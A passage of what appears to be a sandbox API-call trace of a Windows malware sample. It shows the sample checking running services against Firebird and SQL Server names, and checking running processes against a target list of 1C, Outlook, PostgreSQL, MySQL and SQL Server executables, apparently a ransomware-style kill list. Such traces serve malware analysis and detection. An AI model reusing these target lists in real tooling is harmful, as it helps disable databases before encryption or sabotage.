	[0039.829] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0039.829] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0039.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0039.829] lstrlenW (lpString="RpcEptMapper") returned 12
	[0039.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0039.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0039.830] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0039.830] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0039.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0039.830] lstrlenW (lpString="RpcSs") returned 5
	[0039.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0039.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0039.830] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0039.830] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0039.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0039.830] lstrlenW (lpString="SamSs") returned 5
	[0039.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0039.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0039.830] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0039.830] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0039.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0039.830] lstrlenW (lpString="Schedule") returned 8
	[0039.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0039.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0039.830] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0039.830] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0039.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0039.830] lstrlenW (lpString="SENS") returned 4
	[0039.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0039.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0039.830] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0039.830] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0039.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0039.830] lstrlenW (lpString="ShellHWDetection") returned 16
	[0039.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0039.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0039.830] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0039.830] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0039.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0039.831] lstrlenW (lpString="Spooler") returned 7
	[0039.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0039.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0039.831] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0039.831] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0039.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0039.831] lstrlenW (lpString="SysMain") returned 7
	[0039.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0039.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0039.831] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0039.831] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0039.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0039.831] lstrlenW (lpString="Themes") returned 6
	[0039.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0039.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0039.831] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0039.831] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0039.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0039.831] lstrlenW (lpString="TrkWks") returned 6
	[0039.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0039.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0039.831] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0039.831] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0039.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0039.831] lstrlenW (lpString="UxSms") returned 5
	[0039.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0039.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0039.831] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0039.831] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0039.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0039.831] lstrlenW (lpString="VSS") returned 3
	[0039.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0039.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0039.831] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0039.832] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0039.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0039.832] lstrlenW (lpString="WdiServiceHost") returned 14
	[0039.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0039.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0039.832] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0039.832] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0039.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0039.832] lstrlenW (lpString="WdiSystemHost") returned 13
	[0039.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0039.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0039.832] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0039.832] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0039.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0039.832] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0039.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0039.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0039.832] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0039.832] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0039.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0039.832] lstrlenW (lpString="Winmgmt") returned 7
	[0039.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0039.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0039.832] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0039.832] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0039.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0039.832] lstrlenW (lpString="WPDBusEnum") returned 10
	[0039.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0039.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0039.832] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0039.832] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0039.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0039.832] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e5ca88 | out: hHeap=0x7d60000) returned 1
	[0039.832] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x184
	[0039.835] Process32FirstW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0039.835] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0039.836] lstrlenW (lpString="System") returned 6
	[0039.836] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0039.836] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0039.836] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0039.836] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0039.836] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0039.836] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0039.836] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0039.836] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0039.836] lstrlenW (lpString="smss.exe") returned 8
	[0039.836] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0039.836] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0039.836] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0039.836] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0039.836] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0039.836] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0039.836] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0039.836] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0039.837] lstrlenW (lpString="csrss.exe") returned 9
	[0039.837] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0039.837] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0039.837] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0039.837] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0039.837] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0039.837] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0039.837] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0039.837] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0039.838] lstrlenW (lpString="wininit.exe") returned 11
	[0039.838] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0039.838] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0039.838] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0039.838] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0039.838] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0039.838] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0039.838] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0039.838] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0039.838] lstrlenW (lpString="csrss.exe") returned 9
	[0039.838] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0039.838] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0039.839] lstrlenW (lpString="winlogon.exe") returned 12
	[0039.839] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0039.839] lstrlenW (lpString="services.exe") returned 12
	[0039.840] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0039.840] lstrlenW (lpString="lsass.exe") returned 9
	[0039.840] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0039.840] lstrlenW (lpString="lsm.exe") returned 7
	[0039.840] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0039.841] lstrlenW (lpString="svchost.exe") returned 11
	[0039.841] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0039.841] lstrlenW (lpString="svchost.exe") returned 11
	[0039.841] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0039.842] lstrlenW (lpString="svchost.exe") returned 11
	[0039.842] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0039.842] lstrlenW (lpString="svchost.exe") returned 11
	[0039.842] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0039.843] lstrlenW (lpString="svchost.exe") returned 11
	[0039.843] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0039.843] lstrlenW (lpString="audiodg.exe") returned 11
	[0039.843] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0039.844] lstrlenW (lpString="svchost.exe") returned 11
	[0039.844] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0039.844] lstrlenW (lpString="svchost.exe") returned 11
	[0039.844] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0039.845] lstrlenW (lpString="dwm.exe") returned 7
	[0039.845] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0039.845] lstrlenW (lpString="explorer.exe") returned 12
	[0039.845] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0039.846] lstrlenW (lpString="spoolsv.exe") returned 11
	[0039.846] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0039.846] lstrlenW (lpString="taskhost.exe") returned 12
	[0039.846] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0039.847] lstrlenW (lpString="svchost.exe") returned 11
	[0039.847] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0039.847] lstrlenW (lpString="taskeng.exe") returned 11
	[0039.847] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0039.847] lstrlenW (lpString="taskhost.exe") returned 12
	[0039.847] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0039.848] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0039.848] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0039.848] lstrlenW (lpString="python tragedy.exe") returned 18
	[0039.848] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0039.849] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0039.849] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0039.850] lstrlenW (lpString="computers.exe") returned 13
	[0039.850] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0039.850] lstrlenW (lpString="separated.exe") returned 13
	[0039.850] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0039.851] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0039.851] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0039.851] lstrlenW (lpString="darkness.exe") returned 12
	[0039.851] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0039.851] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0039.852] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0039.852] lstrlenW (lpString="sophisticated.exe") returned 17
	[0039.852] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0039.852] lstrlenW (lpString="wishlist.exe") returned 12
	[0039.852] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0039.853] lstrlenW (lpString="top.exe") returned 7
	[0039.853] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0039.853] lstrlenW (lpString="implemented.exe") returned 15
	[0039.853] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0039.854] lstrlenW (lpString="comp.exe") returned 8
	[0039.854] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0039.854] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0039.854] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0039.855] lstrlenW (lpString="solved.exe") returned 10
	[0039.855] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0039.855] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0039.855] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0039.856] lstrlenW (lpString="trips.exe") returned 9
